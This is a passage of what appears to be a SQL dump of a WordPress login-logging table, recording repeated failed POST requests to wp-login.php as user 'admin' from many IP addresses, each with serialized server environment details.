00:00:00'),(95275,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41936\";s:11:\"REMOTE_ADDR\";s:12:\"91.238.162.8\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746856314.031121;s:12:\"REQUEST_TIME\";i:1746856314;}}','91.238.162.8',0,'2025-05-10 11:21:55','1970-01-01 00:00:00'),(95276,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36764\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.58\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746856941.9538939;s:12:\"REQUEST_TIME\";i:1746856941;}}','198.54.114.58',0,'2025-05-10 11:32:23','1970-01-01 00:00:00'),(95277,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44058\";s:11:\"REMOTE_ADDR\";s:14:\"188.166.237.78\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746857564.1424949;s:12:\"REQUEST_TIME\";i:1746857564;}}','188.166.237.78',0,'2025-05-10 11:42:45','1970-01-01 00:00:00'),(95278,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55952\";s:11:\"REMOTE_ADDR\";s:13:\"85.13.217.246\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746858183.4724;s:12:\"REQUEST_TIME\";i:1746858183;}}','85.13.217.246',0,'2025-05-10 11:53:05','1970-01-01 00:00:00'),(95279,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49184\";s:11:\"REMOTE_ADDR\";s:12:\"37.187.26.72\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746858798.907491;s:12:\"REQUEST_TIME\";i:1746858798;}}','37.187.26.72',0,'2025-05-10 12:03:20','1970-01-01 00:00:00'),(95280,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38780\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.72\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746859423.058938;s:12:\"REQUEST_TIME\";i:1746859423;}}','198.54.114.72',0,'2025-05-10 12:13:44','1970-01-01 00:00:00'),(95281,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45618\";s:11:\"REMOTE_ADDR\";s:12:\"31.172.67.59\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746860054.2468519;s:12:\"REQUEST_TIME\";i:1746860054;}}','31.172.67.59',0,'2025-05-10 12:24:16','1970-01-01 00:00:00'),(95282,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"25252\";s:11:\"REMOTE_ADDR\";s:14:\"183.90.183.156\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746860682.3044491;s:12:\"REQUEST_TIME\";i:1746860682;}}','183.90.183.156',0,'2025-05-10 12:34:44','1970-01-01 00:00:00'),(95283,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57730\";s:11:\"REMOTE_ADDR\";s:14:\"176.126.200.33\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746861309.430017;s:12:\"REQUEST_TIME\";i:1746861309;}}','176.126.200.33',0,'2025-05-10 12:45:11','1970-01-01 00:00:00'),(95284,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57466\";s:11:\"REMOTE_ADDR\";s:14:\"164.90.168.112\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746861938.438659;s:12:\"REQUEST_TIME\";i:1746861938;}}','164.90.168.112',0,'2025-05-10 12:55:40','1970-01-01 00:00:00'),(95285,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34510\";s:11:\"REMOTE_ADDR\";s:13:\"199.188.201.3\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s